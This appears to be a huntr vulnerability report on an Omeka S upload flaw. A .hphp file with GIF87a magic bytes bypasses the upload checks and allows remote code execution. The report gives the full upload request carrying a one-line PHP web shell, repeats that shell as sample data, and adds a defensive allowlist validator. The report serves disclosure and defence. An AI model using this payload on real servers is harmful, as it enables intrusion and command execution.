Unrestricted Upload File leads to Remote Code Execution

huntr report E2E2365E-6A5F-4CA4-9EF1-297E3ED41F9C
Reported by tuannq2299 on Aug 02, 2023, 18:00:34
www.huntr.dev
Tags: apache server, file upload vulnerability, magic bytes technique, whitelist bypass, hphp file, remote code execution, web application security, bug bounty

EPSS: 0.001 (Low), percentile 19.9%

Description

The file upload function is vulnerable: a user can upload files with other extensions (.php, .phps, …) by using the magic bytes technique. The .htaccess file blocks almost all files with extensions such as php, phps, phtml, …, but it does not cover every extension the server might execute.
An attacker can still upload a .hphp file and then execute code from a remote machine.

Condition

The Apache server hosting the web application needs to be configured to execute .hphp files.

Proof of Concept

Step 1: Log in and go to the function that allows uploading, intercept the request, and modify it as below

POST /omeka-s/admin/asset/add HTTP/1.1
Host: localhost
Content-Length: 344
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="104"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9KHufs2z61gFOMA6
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/omeka-s/admin/asset
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: b8bc1e26ae4f54844a68a1cc98faa75a=lner6c64iimgk1pj70i6ikanpi
Connection: close

------WebKitFormBoundary9KHufs2z61gFOMA6
Content-Disposition: form-data; name="file"; filename="shell_php.hphp"
Content-Type: application/octet-stream

GIF87a <?php echo system($_REQUEST['cmd']);?>
------WebKitFormBoundary9KHufs2z61gFOMA6
Content-Disposition: form-data; name="o:alt_text"


------WebKitFormBoundary9KHufs2z61gFOMA6--

With the magic bytes GIF87a, the attacker bypasses the content check and can upload a file (.hphp) whose extension is not in the whitelist.

Step 2: Check the file path

Step 3: Access the file path and execute commands
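The description and Step 1 above show why a denylist of extensions combined with a check of only the first few bytes is not enough: the GIF87a magic bytes satisfy the content check, and .hphp is absent from the .htaccess denylist. Below is an added example of an allowlist-based upload validator, written for this page in Python; it is not Omeka S code. The allowlist entries, the forbidden-marker list, the function names and the sample inputs are constructed for the example, and the denylist function only models the .htaccess behaviour the report describes.

```python
"""Hardened upload check (added example, not project code).

Three rules close the gap described in the report:
  1. the extension must be on an allowlist (not absent from a denylist),
  2. the magic bytes must match the extension the client claimed,
  3. the whole body is scanned for script markers, so a file that starts
     with GIF87a but carries a PHP open tag is still rejected.
"""
import os

# Allowlist: extension -> accepted magic-byte prefixes (constructed for the
# example).  Only these extensions are ever stored.
ALLOWED_TYPES = {
    "gif": {b"GIF87a", b"GIF89a"},
    "png": {b"\x89PNG\r\n\x1a\n"},
    "jpg": {b"\xff\xd8\xff"},
    "jpeg": {b"\xff\xd8\xff"},
    "pdf": {b"%PDF-"},
}

# Byte sequences that must never appear anywhere in an image/document upload.
FORBIDDEN_MARKERS = (b"<?php", b"<?=", b"<script")


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason).  The client's Content-Type is ignored."""
    # Drop any directory component and require exactly one extension, which
    # also rejects double extensions such as "logo.gif.php".
    base = os.path.basename(filename)
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "filename must be name.ext with exactly one extension"
    ext = parts[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} is not in the allowlist"
    # Magic bytes must match the *claimed* type, not merely some known type.
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, f"content does not look like a .{ext} file"
    # Scan the entire body, not just the header the magic-bytes trick spoofs.
    if any(marker in data for marker in FORBIDDEN_MARKERS):
        return False, "embedded script marker found in upload body"
    return True, "accepted"


# Model of the denylist approach the report's .htaccess represents: it names
# known PHP extensions but cannot enumerate every extension the server may be
# configured to execute (the report's .hphp is the example).  Constructed list.
DENYLISTED_EXTENSIONS = {"php", "phps", "phtml", "php3", "php4", "php5", "phar"}


def denylist_allows(filename: str) -> bool:
    """True if a denylist-only check would let this filename through."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext not in DENYLISTED_EXTENSIONS


# Constructed samples: the shape of the report's upload, and a benign GIF.
REPORT_STYLE_UPLOAD = (
    "shell_php.hphp",
    b"GIF87a <?php echo system($_REQUEST['cmd']);?>",
)
BENIGN_GIF = (
    "logo.gif",
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00;",
)

if __name__ == "__main__":
    for name, body in (REPORT_STYLE_UPLOAD, BENIGN_GIF, ("logo.gif.php", b"GIF89a")):
        print(name, validate_upload(name, body), "denylist-only:", denylist_allows(name))
```

Run as a script, it shows the report's upload passing the denylist-only check but failing the allowlist, the benign GIF being accepted, and a double-extension name being refused before its content is even inspected. The validator deliberately checks magic bytes against the claimed extension rather than against any known type, since accepting "any recognised header" is exactly what the GIF87a prefix exploits.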
